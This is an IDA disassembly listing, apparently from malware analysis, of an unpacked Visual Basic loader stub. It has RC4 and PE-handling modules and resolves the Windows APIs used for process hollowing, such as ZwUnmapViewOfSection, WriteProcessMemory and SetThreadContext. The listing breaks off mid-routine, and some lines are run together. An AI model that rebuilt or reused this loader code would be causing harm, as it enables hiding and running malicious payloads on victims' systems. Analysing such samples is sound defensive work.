;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : FC4D9F923DACBE4DDFF422F28BED566F
; File Name : u:\work\fc4d9f923dacbe4ddff422f28bed566f_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002724 ( 10020.)
; Section size in file : 00002724 ( 10020.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: DLL 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_401000 dd 7351B1FCh, 7351698Dh ; .text:0040119A�r
dword_401008 dd 734F722Eh ; .text:00402DDE�r
dword_40100C dd 7352109Eh ; sub_401EE0+E6�r ...
dword_401010 dd 7344540Dh ; sub_401EE0+106�r ...
dword_401014 dd 734449CEh ; sub_401EE0+120�r ...
dword_401018 dd 7344DBB0h ; sub_401EE0+C8�r
dword_40101C dd 73521073h ; sub_401EE0+536�r ...
dword_401020 dd 7351624Eh, 735168D5h ; .text:00401194�r
dword_401028 dd 73501681h ; sub_402660+113�r
dword_40102C dd 734F7324h ; sub_401EE0+13E�r ...
dword_401030 dd 735015EEh ; sub_402660+67B�r
dword_401034 dd 73444BE1h ; sub_401EE0+8D�r ...
dword_401038 dd 73516202h dword_40103C dd 73501FF5h ; sub_401EE0+738�r ...
dword_401040 dd 7351629Ah, 7351639Ah ; .text:00401170�r
dword_401048 dd 73447EDFh ; .text:00402E45�r ...
dword_40104C dd 7351B364h dword_401050 dd 73501EF4h ; sub_401EE0+6DF�r
dword_401054 dd 7350B403h ; sub_401EE0+51F�r ...
dword_401058 dd 734444AFh dword_40105C dd 7350C0F5h ; sub_401EE0+FC�r
dword_401060 dd 734463D5h ; sub_401EE0+1DE�r
dword_401064 dd 73502207h ; sub_401EE0+20D�r ...
dword_401068 dd 735024A5h ; .text:00402D9A�r
dword_40106C dd 734449DEh ; .text:00402E5B�r
dword_401070 dd 7343B778h dword_401074 dd 7351698Ah dword_401078 dd 73502101h ; sub_401EE0+1AC�r
dword_40107C dd 73501647h ; sub_402660+CF�r
dword_401080 dd 73506A10h ; .text:00402F1F�r ...
dword_401084 dd 7351B409h, 73444E5Bh ; .text:loc_401146�r
dword_40108C dd 734F6F07h ; sub_401EE0+14C�r ...
dword_401090 dd 7351661Dh, 7351634Eh, 73529D7Fh ; .text:00401182�r ...
dword_40109C dd 7350D2E3h ; sub_401EE0+412�r ...
dword_4010A0 dd 73502451h ; .text:00402F82�r
dword_4010A4 dd 73509E98h ; sub_401EE0+1D7�r
dword_4010A8 dd 7351B2A1h dword_4010AC dd 734F90D2h ; sub_401EE0:loc_402652�r ...
dword_4010B0 dd 73445882h ; sub_401EE0+19A�r
dword_4010B4 dd 7343C7ACh ; sub_401EE0+68�r
dword_4010B8 dd 73445799h ; sub_401EE0+E0�r
dword_4010BC dd 73509D60h ; sub_401EE0+1A3�r
dword_4010C0 dd 73528C4Ch ; sub_401EE0+6C2�r ...
dword_4010C4 dd 735162CEh, 735163CEh ; .text:0040117C�r
dword_4010CC dd 734444F6h ; sub_402660+A5�r ...
dword_4010D0 dd 73516302h, 73515D3Dh ; .text:0040116A�r
dword_4010D8 dd 7342DE3Eh dword_4010DC dd 735024D0h ; sub_401EE0+1E7�r ...
dword_4010E0 dd 7343B836h ; sub_401EE0+12F�r ...
dword_4010E4 dd 734449F1h ; sub_401EE0+168�r
dword_4010E8 dd 735016BBh ; sub_402660+145�r ...
dword_4010EC dd 7351B136h dword_4010F0 dd 7344475Eh ; sub_401EE0+111�r ...
dword_4010F4 dd 735120EAh, 7351B4BAh ; .text:004011C4�r
dword_4010FC dd 735024F3h ; sub_401EE0+23B�r ...
dword_401100 dd 73510F35h dword_401104 dd 734450D7h ; sub_401EE0+BD�r ...
dword_401108 dd 734447FEh ; sub_401EE0+186�r ...
align 10h
dword_401110 dd 40006h, 0 dd offset loc_40261F
dd offset loc_4025DB
dd 8000Eh, 0 ; DATA XREF: sub_402660+25�o
dd offset loc_402CBD
dd offset loc_402C86
dd 8000Eh, 0 ; DATA XREF: .text:00402D55�o
; ---------------------------------------------------------------------------
mov edx, 95004031h
xor [eax+0], eax
jmp ds:dword_401058
; ---------------------------------------------------------------------------
loc_401146: ; DATA XREF: sub_401EE0+6�o
; sub_402660+6�o ...
jmp ds:dword_401084+4
; ---------------------------------------------------------------------------
jmp ds:dword_401090+8
; ---------------------------------------------------------------------------
jmp ds:dword_401040
; ---------------------------------------------------------------------------
jmp ds:dword_401038
; ---------------------------------------------------------------------------
jmp ds:dword_4010C4
; ---------------------------------------------------------------------------
jmp ds:dword_401020
; ---------------------------------------------------------------------------
jmp ds:dword_4010D0+4
; ---------------------------------------------------------------------------
jmp ds:dword_401040+4
; ---------------------------------------------------------------------------
jmp ds:dword_4010D0
; ---------------------------------------------------------------------------
jmp ds:dword_4010C4+4
; ---------------------------------------------------------------------------
jmp ds:dword_401090+4
; ---------------------------------------------------------------------------
jmp ds:dword_401074
; ---------------------------------------------------------------------------
jmp ds:dword_401090
; ---------------------------------------------------------------------------
jmp ds:dword_401020+4
; ---------------------------------------------------------------------------
jmp ds:dword_401000+4
; ---------------------------------------------------------------------------
jmp ds:dword_4010EC
; ---------------------------------------------------------------------------
jmp ds:dword_401000
; ---------------------------------------------------------------------------
jmp ds:dword_401100
; ---------------------------------------------------------------------------
jmp ds:dword_4010A8
; ---------------------------------------------------------------------------
jmp ds:dword_40104C
; ---------------------------------------------------------------------------
jmp ds:dword_401084
; ---------------------------------------------------------------------------
jmp ds:dword_4010F4+4
; ---------------------------------------------------------------------------
jmp ds:dword_4010F4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011D0 proc near ; CODE XREF: sub_401890+15�p
; sub_4018D8+15�p ...
jmp ds:dword_401070
sub_4011D0 endp
; ---------------------------------------------------------------------------
jmp ds:dword_401030
; ---------------------------------------------------------------------------
jmp ds:dword_4010E8
; ---------------------------------------------------------------------------
jmp ds:dword_401028
; ---------------------------------------------------------------------------
jmp ds:dword_40107C
; ---------------------------------------------------------------------------
jmp ds:dword_4010CC
; ---------------------------------------------------------------------------
jmp ds:dword_4010AC
; ---------------------------------------------------------------------------
jmp ds:dword_40103C
; ---------------------------------------------------------------------------
jmp ds:dword_401050
; ---------------------------------------------------------------------------
jmp ds:dword_4010C0
; ---------------------------------------------------------------------------
jmp ds:dword_40101C
; ---------------------------------------------------------------------------
jmp ds:dword_401054
; ---------------------------------------------------------------------------
jmp ds:dword_40109C
; ---------------------------------------------------------------------------
jmp ds:dword_4010FC
; ---------------------------------------------------------------------------
jmp ds:dword_401064
; ---------------------------------------------------------------------------
jmp ds:dword_4010DC
; ---------------------------------------------------------------------------
jmp ds:dword_401060
; ---------------------------------------------------------------------------
jmp ds:dword_4010A4
; ---------------------------------------------------------------------------
jmp ds:dword_4010BC
; ---------------------------------------------------------------------------
jmp ds:dword_401078
; ---------------------------------------------------------------------------
jmp ds:dword_4010B0
; ---------------------------------------------------------------------------
jmp ds:dword_401108
; ---------------------------------------------------------------------------
jmp ds:dword_40108C
; ---------------------------------------------------------------------------
jmp ds:dword_40102C
; ---------------------------------------------------------------------------
jmp ds:dword_4010E0
; ---------------------------------------------------------------------------
jmp ds:dword_401014
; ---------------------------------------------------------------------------
jmp ds:dword_4010E4
; ---------------------------------------------------------------------------
jmp ds:dword_40105C
; ---------------------------------------------------------------------------
jmp ds:dword_401010
; ---------------------------------------------------------------------------
jmp ds:dword_4010F0
; ---------------------------------------------------------------------------
jmp ds:dword_40100C
; ---------------------------------------------------------------------------
jmp ds:dword_4010B8
; ---------------------------------------------------------------------------
jmp ds:dword_401018
; ---------------------------------------------------------------------------
jmp ds:dword_401104
; ---------------------------------------------------------------------------
jmp ds:dword_401034
; ---------------------------------------------------------------------------
jmp ds:dword_4010B4
; ---------------------------------------------------------------------------
jmp ds:dword_4010A0
; ---------------------------------------------------------------------------
jmp ds:dword_401080
; ---------------------------------------------------------------------------
jmp ds:dword_40106C
; ---------------------------------------------------------------------------
jmp ds:dword_401048
; ---------------------------------------------------------------------------
jmp ds:dword_401008
; ---------------------------------------------------------------------------
jmp ds:dword_401068
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4012CC proc near ; CODE XREF: start+5�p
jmp ds:dword_4010D8
sub_4012CC endp
; ---------------------------------------------------------------------------
align 4
; [0000000A BYTES: COLLAPSED CHUNK OF FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
dw 0
dd 0
dd 30h, 38h, 0
dd 0B15610F3h, 44DA09D3h, 0FDE2D99Ch, 0CCB5E8AEh, 0
dd 10000h, 0D670000h, 2020200Ah, 53706276h, 627574h, 0
dword_40131C dd 20001h, 401710h, 0 ; .data:00404474�o
dd 2 dup(0FFFFFFFFh), 0
dd offset off_4017C4
dd offset dword_404160
align 10h
dd 1EA848h, 3 dup(0)
dd offset dword_401354
dword_401354 dd 10001h, 401710h, 0 ; .text:off_401794�o ...
dd 2 dup(0FFFFFFFFh), 0
dd offset off_401794
dd offset dword_404018
align 8
dd 1E2A30h, 3 dup(0)
dd offset dword_40138C
dword_40138C dd 6, 401E2Ch, 7, 401B24h, 7, 401ADCh, 7, 401A90h, 7, 401A44h
; DATA XREF: .text:00401388�o
; .text:00401708�o
dd 7, 4019E8h, 7, 4019A0h, 7, 401954h, 7, 401908h, 7, 4018C0h
dd 7, 401878h, 1, 401710h, 0
dd 2 dup(0FFFFFFFFh), 0
dd offset off_401764
dd offset dword_404008
dd 0Ah, 401420h, 200001h, 0
dd 1F9B74h, 40141Ch, 401814h, 300h, 2FE8369h, 2 dup(0FFFFFFFFh)
dd 0FFFF0008h, 0
dd 60h, 84h, 0
dd 2FC8369h
dd 21354256h, 2A1FF0h, 3 dup(0) ; DATA XREF: start�o
dd 7Eh, 2 dup(0)
dd 0A0000h, 409h, 0
dd offset sub_401EE0
dd offset dword_4014D4
dd 30F000h, 0FFFFFF00h, 8, 1, 0
dd 0E9h, 2 dup(40131Ch), 4012E0h, 78h, 7Dh, 82h, 83h, 4 dup(0)
aStub db 'Stub',0
aStub_0 db 'Stub',0
dw 7600h
aBpstub db 'bpStub',0
align 4
dword_4014D4 dd 1F4h, 401710h, 0 dd 0A401ED0h, 403210h, 540h, 404008h, 401146h, 404000h
dd 5C002Ah, 430041h, 5C003Ah, 6F0044h, 750063h, 65006Dh
dd 74006Eh, 200073h, 6E0061h, 200064h, 650053h, 740074h
dd 6E0069h, 730067h, 50005Ch, 640065h, 6F0072h, 41005Ch
dd 62006Dh, 650069h, 74006Eh, 200065h, 650064h, 740020h
dd 610072h, 610062h, 68006Ch, 5C006Fh, 720043h, 700079h
dd 690074h, 5F0063h, 720053h, 5C0063h, 620076h, 530070h
dd 750074h, 2E0062h, 620076h, 70h, 5 dup(0)
db 2 dup(0)
; [0000000F BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 10h
dd 52h dup(0)
dd offset dword_40138C
dword_40170C dd 0Bh, 0 ; .data:0040418C�o
dd offset dword_404180
dd offset dword_401EA4
dd 0FFFFFFFFh, 0
dd offset dword_404170
dd 0E750D04Bh, 4F73FE37h, 3841687h, 0A205043Ch, 3000Ah
dd 30003h, 401764h, 3 dup(0)
dd offset aVbpstub ; "vbpStub"
dd 409h, 816h, 0
dd 2
off_401764 dd offset dword_40138C+58h ; DATA XREF: .text:004013FC�o
dd 0FFFFFFFFh, 401B58h, 0
dd offset dword_404010
dd 0
dd offset aBasmain ; "basMain"
dd 0Ch, 0
dd 0FFFFh, 18001h, 0
off_401794 dd offset dword_401354 ; DATA XREF: .text:0040136C�o
dd 0FFFFFFFFh, 401C08h, 0
dd offset dword_404020
dd 0
dd offset aBaspe ; "basPE"
dd 2 dup(0)
dd 0FFFFh, 18001h, 0
off_4017C4 dd offset dword_40131C ; DATA XREF: .text:00401334�o
dd 0FFFFFFFFh, 401B58h, 0
dd offset dword_404168
dd 0
dd offset aBasrc4 ; "basRC4"
dd 1, 0
dd 0FFFFh, 18001h, 0
aBasmain db 'basMain',0 ; DATA XREF: .text:0040177C�o
aBaspe db 'basPE',0 ; DATA XREF: .text:004017AC�o
align 4
aBasrc4 db 'basRC4',0 ; DATA XREF: .text:004017DC�o
align 4
aVbpstub db 'vbpStub',0 ; DATA XREF: .text:00401750�o
dword_401814 dd 440018h, 30000h, 2C040044h, 10004h, 10008h, 1000Ch
; DATA XREF: sub_402660+C0�o
; sub_402660+10E�o ...
dd 10000Ch, 0
dd 4040010h, 70000Ch, 0
dd 4040070h, 0CC000Ch, 0
db 0CCh
align 2
dw 404h
dd 9
aKernel32 db 'kernel32',0 ; DATA XREF: .text:off_401878�o
; .text:off_4018C0�o ...
align 10h
dd 13h
aGetmodulefilen db 'GetModuleFileNameA',0 ; DATA XREF: .text:0040187C�o
align 4
off_401878 dd offset aKernel32 ; DATA XREF: sub_401890:loc_40189B�o
; "kernel32"
dd offset aGetmodulefilen ; "GetModuleFileNameA"
dd 40000h, 4044CCh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401890 proc near ; CODE XREF: sub_401EE0+137�p
mov eax, dword_4044D4
or eax, eax
jz short loc_40189B
jmp eax
; ---------------------------------------------------------------------------
loc_40189B: ; CODE XREF: sub_401890+7�j
push offset off_401878
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401890 endp
; ---------------------------------------------------------------------------
align 4
dword_4018AC dd 0Eh, 4D6C7452h, 4D65766Fh, 726F6D65h, 79hoff_4018C0 dd offset aKernel32 ; DATA XREF: sub_4018D8:loc_4018E3�o
; "kernel32"
dd offset dword_4018AC+4
dd 40000h, 4044D8h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4018D8 proc near ; CODE XREF: sub_401EE0+230�p
; sub_401EE0+29F�p ...
mov eax, dword_4044E0
or eax, eax
jz short loc_4018E3
jmp eax
; ---------------------------------------------------------------------------
loc_4018E3: ; CODE XREF: sub_4018D8+7�j
push offset off_4018C0
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_4018D8 endp
; ---------------------------------------------------------------------------
align 4
dword_4018F4 dd 0Fh, 61657243h, 72506574h, 7365636Fh, 4173hoff_401908 dd offset aKernel32 ; DATA XREF: sub_401920:loc_40192B�o
; "kernel32"
dd offset dword_4018F4+4
dd 40000h, 4044E4h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401920 proc near ; CODE XREF: sub_402660+F3�p
mov eax, dword_4044EC
or eax, eax
jz short loc_40192B
jmp eax
; ---------------------------------------------------------------------------
loc_40192B: ; CODE XREF: sub_401920+7�j
push offset off_401908
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401920 endp
; ---------------------------------------------------------------------------
align 4
dd 12h
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: .text:00401958�o
align 4
off_401954 dd offset aKernel32 ; DATA XREF: sub_40196C:loc_401977�o
; "kernel32"
dd offset aReadprocessmem ; "ReadProcessMemory"
dd 40000h, 4044F0h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_40196C proc near ; CODE XREF: sub_402660+18E�p
mov eax, dword_4044F8
or eax, eax
jz short loc_401977
jmp eax
; ---------------------------------------------------------------------------
loc_401977: ; CODE XREF: sub_40196C+7�j
push offset off_401954
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_40196C endp
; ---------------------------------------------------------------------------
align 4
dd 13h
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: .text:004019A4�o
align 10h
off_4019A0 dd offset aKernel32 ; DATA XREF: sub_4019B8:loc_4019C3�o
; "kernel32"
dd offset aWriteprocessme ; "WriteProcessMemory"
dd 40000h, 4044FCh, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_4019B8 proc near ; CODE XREF: sub_402660+31B�p
; sub_402660+58D�p ...
mov eax, dword_404504
or eax, eax
jz short loc_4019C3
jmp eax
; ---------------------------------------------------------------------------
loc_4019C3: ; CODE XREF: sub_4019B8+7�j
push offset off_4019A0
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_4019B8 endp
; ---------------------------------------------------------------------------
align 4
dword_4019D4 dd 0Fh, 74726956h, 416C6175h, 636F6C6Ch, 7845hoff_4019E8 dd offset aKernel32 ; DATA XREF: sub_401A00:loc_401A0B�o
; "kernel32"
dd offset dword_4019D4+4
dd 40000h, 404508h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401A00 proc near ; CODE XREF: sub_402660+2A8�p
mov eax, dword_404510
or eax, eax
jz short loc_401A0B
jmp eax
; ---------------------------------------------------------------------------
loc_401A0B: ; CODE XREF: sub_401A00+7�j
push offset off_4019E8
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401A00 endp
; ---------------------------------------------------------------------------
align 4
dd 6
aNtdll db 'ntdll',0 ; DATA XREF: .text:off_401A44�o
align 4
dd 15h
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: .text:00401A48�o
align 4
off_401A44 dd offset aNtdll ; DATA XREF: sub_401A5C:loc_401A67�o
; "ntdll"
dd offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
dd 40000h, 404514h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401A5C proc near ; CODE XREF: sub_402660+1A3�p
mov eax, dword_40451C
or eax, eax
jz short loc_401A67
jmp eax
; ---------------------------------------------------------------------------
loc_401A67: ; CODE XREF: sub_401A5C+7�j
push offset off_401A44
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401A5C endp
; ---------------------------------------------------------------------------
align 4
dword_401A78 dd 11h, 54746547h, 61657268h, 6E6F4364h, 74786574h, 0
; DATA XREF: .text:00401A94�o
off_401A90 dd offset aKernel32 ; DATA XREF: sub_401AA8:loc_401AB3�o
; "kernel32"
dd offset dword_401A78+4
dd 40000h, 404520h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401AA8 proc near ; CODE XREF: sub_402660+163�p
mov eax, dword_404528
or eax, eax
jz short loc_401AB3
jmp eax
; ---------------------------------------------------------------------------
loc_401AB3: ; CODE XREF: sub_401AA8+7�j
push offset off_401A90
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401AA8 endp
; ---------------------------------------------------------------------------
align 4
dword_401AC4 dd 11h, 54746553h, 61657268h, 6E6F4364h, 74786574h, 0
; DATA XREF: .text:00401AE0�o
off_401ADC dd offset aKernel32 ; DATA XREF: sub_401AF4:loc_401AFF�o
; "kernel32"
dd offset dword_401AC4+4
dd 40000h, 40452Ch, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401AF4 proc near ; CODE XREF: sub_402660+60A�p
mov eax, dword_404534
or eax, eax
jz short loc_401AFF
jmp eax
; ---------------------------------------------------------------------------
loc_401AFF: ; CODE XREF: sub_401AF4+7�j
push offset off_401ADC
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401AF4 endp
; ---------------------------------------------------------------------------
align 10h
dword_401B10 dd 0Dh, 75736552h, 6854656Dh, 64616572h, 0off_401B24 dd offset aKernel32 ; DATA XREF: sub_401B3C:loc_401B47�o
; "kernel32"
dd offset dword_401B10+4
dd 40000h, 404538h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401B3C proc near ; CODE XREF: sub_402660+618�p
mov eax, dword_404540
or eax, eax
jz short loc_401B47
jmp eax
; ---------------------------------------------------------------------------
loc_401B47: ; CODE XREF: sub_401B3C+7�j
push offset off_401B24
mov eax, offset sub_4011D0
call eax ; sub_4011D0
jmp eax
sub_401B3C endp
; ---------------------------------------------------------------------------
align 4
dd 8000Ch, 2 dup(0)
dword_401B64 dd 0FCFB3D23h, 1068A0FAh, 838A7h, 0B571332Bhdword_401B74 dd 0FCFB3D22h, 1068A0FAh, 838A7h, 0B571332Bhdword_401B84 dd 2, 401B64h, 401B74h, 0dword_401B94 dd 33AD4F79h, 11CF6699h, 0AA000CB7h, 93D36000h, 16h
; DATA XREF: sub_401EE0+AA�o
dword_401BA8 dd 4, 1, 0 dd 1730000h, 0FFFFFFFFh, 1, 40000Ch, 0
dd 4040040h, 14000Ch, 0
dd 4040014h, 8000Ch, 0
dd 4040008h, 0E0000Ch, 0
dd 40400E0h, 0F8000Ch, 0
dd 40400F8h, 28000Ch, 0
dd 4040028h, 1400016h, 10000h, 0
dd 1050138h, 0FFFFFFFFh, 0A0000h, 36414256h, 4C4C4400h
dd 0
a__vbarecdestru db '__vbaRecDestruct',0
align 10h
a__vbarecdest_0 db '__vbaRecDestructAnsi',0
align 4
a__vbarecansito db '__vbaRecAnsiToUni',0
align 4
a__vbarecunitoa db '__vbaRecUniToAnsi',0
align 10h
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 53h ; S
db 74h ; t
db 72h ; r
; Teeconst::_16586
@Teeconst@_16586 db 'Copy',0
align 10h
a__vbaerrorover db '__vbaErrorOverflow',0
align 4
a__vbaarydestru db '__vbaAryDestruct',0
align 4
a__vbaerase db '__vbaErase',0
align 4
a__vbavar2vec db '__vbaVar2Vec',0
align 4
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 53h ; S
db 65h ; e
db 74h ; t
db 53h ; S
db 79h ; y
db 73h ; s
db 74h ; t
db 65h ; e
db 6Dh ; m
; Zlibconst::_16390
@Zlibconst@_16390 db 'Error',0
a__vbafreevarli db '__vbaFreeVarList',0
align 4
a__vbaaryunlock db '__vbaAryUnlock',0
align 4
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 47h ; G
db 65h ; e
db 6Eh ; n
db 65h ; e
db 72h ; r
db 61h ; a
db 74h ; t
db 65h ; e
db 42h ; B
db 6Fh ; o
db 75h ; u
db 6Eh ; n
db 64h ; d
db 73h ; s
; Zlibconst::_16390
@Zlibconst@_16390_0 db 'Error',0
align 4
a__vbaarylock db '__vbaAryLock',0
align 4
a__vbafileclose db '__vbaFileClose',0
align 4
dd 0
a__vbagetowner3 db '__vbaGetOwner3',0
align 4
a__vbaredim db '__vbaRedim',0
align 4
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 46h ; F
db 69h ; i
db 6Ch ; l
db 65h ; e
; Consts::_16386
@Consts@_16386 db 'Open',0
align 4
a__vbafreestr db '__vbaFreeStr',0
align 4
db 5Fh ; _
db 5Fh ; _
db 76h ; v
db 62h ; b
db 61h ; a
db 53h ; S
db 74h ; t
db 72h ; r
db 54h ; T
db 6Fh ; o
; Consts::_16914
@Consts@_16914 db 'Unicode',0
align 4
a__vbastrtoansi db '__vbaStrToAnsi',0
align 4
a__vbalenbstr db '__vbaLenBstr',0
align 4
a__vbastrvarmov db '__vbaStrVarMove',0
a__vbastrmove db '__vbaStrMove',0
align 4
a__vbafreevar db '__vbaFreeVar',0
align 4
a__vbaend db '__vbaEnd',0
align 4
a__vbafreeobj db '__vbaFreeObj',0
align 4
a__vbahresultch db '__vbaHresultCheckObj',0
align 10h
a__vbanew2 db '__vbaNew2',0
align 4
dd offset dword_401B64
dd offset dword_404544
dd 18h
dword_401E38 dd 920001h, 2, 2 dup(0) dd 100h, 0
a__vbaubound db '__vbaUbound',0
a__vbaui1i2 db '__vbaUI1I2',0
align 4
a__vbai2i4 db '__vbaI2I4',0
align 4
a__vbaarymove db '__vbaAryMove',0
align 4
a__vbaaryconstr db '__vbaAryConstruct2',0
align 4
dword_401E98 dd 3 dup(0FFFFFFFFh)dword_401EA4 dd 0 dd offset dword_40170C+4
dd 0FFFFFFFFh, 0
dd offset dword_401E98
dd 3 dup(0)
dd 0FFFFFFFFh, 0
align 10h
dd 0E9E9E9E9h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EE0 proc near ; DATA XREF: .text:00401474�o
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = dword ptr -0A0h
var_88 = dword ptr -88h
var_80 = dword ptr -80h
var_6C = dword ptr -6Ch
var_64 = dword ptr -64h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
push offset loc_401146
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 9Ch
push ebx
push esi
push edi
mov [ebp+var_8], esp
mov [ebp+var_4], offset dword_401110
mov eax, dword_404544
xor edi, edi
cmp eax, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
mov [ebp+var_24], edi
mov [ebp+var_28], edi
mov [ebp+var_2C], edi
mov [ebp+var_30], edi
mov [ebp+var_34], edi
mov [ebp+var_38], edi
mov [ebp+var_48], edi
mov [ebp+var_58], edi
mov [ebp+var_5C], edi
mov [ebp+var_6C], edi
mov [ebp+var_80], edi
jnz short loc_401F4E
push offset dword_404544
push offset dword_401B84
call ds:dword_4010B4
loc_401F4E: ; CODE XREF: sub_401EE0+5C�j
mov esi, dword_404544
lea ecx, [ebp+var_38]
push ecx
push esi
mov eax, [esi]
call dword ptr [eax+14h]
cmp eax, edi
fnclex
jge short loc_401F73
push 14h
push offset dword_401B74
push esi
push eax
call ds:dword_401034
loc_401F73: ; CODE XREF: sub_401EE0+82�j
mov eax, [ebp+var_38]
lea ecx, [ebp+var_80]
push ecx
push eax
mov edx, [eax]
mov esi, eax
call dword ptr [edx+68h]
cmp eax, edi
fnclex
jge short loc_401F97
push 68h
push offset dword_401B94
push esi
push eax
call ds:dword_401034
loc_401F97: ; CODE XREF: sub_401EE0+A6�j
mov esi, [ebp+var_80]
lea ecx, [ebp+var_38]
call ds:dword_401104
cmp si, di
jz short loc_401FAE
call ds:dword_401018
loc_401FAE: ; CODE XREF: sub_401EE0+C6�j
lea edx, [ebp+var_48]
mov [ebp+var_40], 80020004h
push edx
mov [ebp+var_48], 0Ah
call ds:dword_4010B8
mov ebx, ds:dword_40100C
lea ecx, [ebp+var_48]
mov esi, eax
call ebx
lea eax, [ebp+var_48]
push 104h
push eax
call ds:dword_40105C
lea ecx, [ebp+var_48]
push ecx
call ds:dword_401010
mov edx, eax
lea ecx, [ebp+var_1C]
call ds:dword_4010F0
lea ecx, [ebp+var_48]
call ebx
mov edx, [ebp+var_1C]
push edx
call ds:dword_401014
push eax
mov eax, [ebp+var_1C]
lea ecx, [ebp+var_34]
push eax
push ecx
call ds:dword_4010E0
push eax
push edi
call sub_401890
mov edi, eax
call ds:dword_40102C
mov edx, [ebp+var_34]
lea eax, [ebp+var_1C]
push edx
push eax
call ds:dword_40108C
lea edx, [ebp+var_6C]
push edi
lea eax, [ebp+var_48]
lea ecx, [ebp+var_1C]
push edx
push eax
mov [ebp+var_64], ecx
mov [ebp+var_6C], 4008h
call ds:dword_4010E4
lea ecx, [ebp+var_48]
push ecx
call ds:dword_401010
mov edx, eax
lea ecx, [ebp+var_1C]
call ds:dword_4010F0
lea ecx, [ebp+var_34]
call ds:dword_401108
lea ecx, [ebp+var_48]
call ebx
mov edx, [ebp+var_1C]
push edx
push esi
push 0FFFFFFFFh
push 20h
call ds:dword_4010B0
push 0
push esi
call ds:dword_4010BC
sub eax, 1
mov edi, ds:dword_401078
jo loc_402652
push eax
push 1
lea eax, [ebp+var_28]
push 11h
push eax
push 1
push 80h
call edi
add esp, 1Ch
push esi
lea ecx, [ebp+var_28]
push ecx
push offset dword_401BA8
call ds:dword_4010A4
push esi
call ds:dword_401060
mov edx, [ebp+var_28]
mov esi, ds:dword_4010DC
lea eax, [ebp+var_2C]
push edx
push eax
call esi
mov ecx, [ebp+var_2C]
test ecx, ecx
jz short loc_4020FA
cmp word ptr [ecx], 1
jnz short loc_4020FA
mov ebx, [ecx+14h]
mov eax, [ecx+10h]
neg ebx
cmp ebx, eax
jb short loc_4020F6
call ds:dword_401064
mov ecx, [ebp+var_2C]
loc_4020F6: ; CODE XREF: sub_401EE0+20B�j
mov eax, ebx
jmp short loc_402103
; ---------------------------------------------------------------------------
loc_4020FA: ; CODE XREF: sub_401EE0+1F9�j
; sub_401EE0+1FF�j
call ds:dword_401064
mov ecx, [ebp+var_2C]
loc_402103: ; CODE XREF: sub_401EE0+218�j
mov ecx, [ecx+0Ch]
push 40h
add ecx, eax
push ecx
push offset dword_404020
call sub_4018D8
call ds:dword_40102C
mov ebx, ds:dword_4010FC
lea edx, [ebp+var_2C]
push edx
call ebx
mov eax, [ebp+var_28]
lea ecx, [ebp+var_2C]
push eax
push ecx
call esi
mov ecx, [ebp+var_2C]
test ecx, ecx
jz short loc_402166
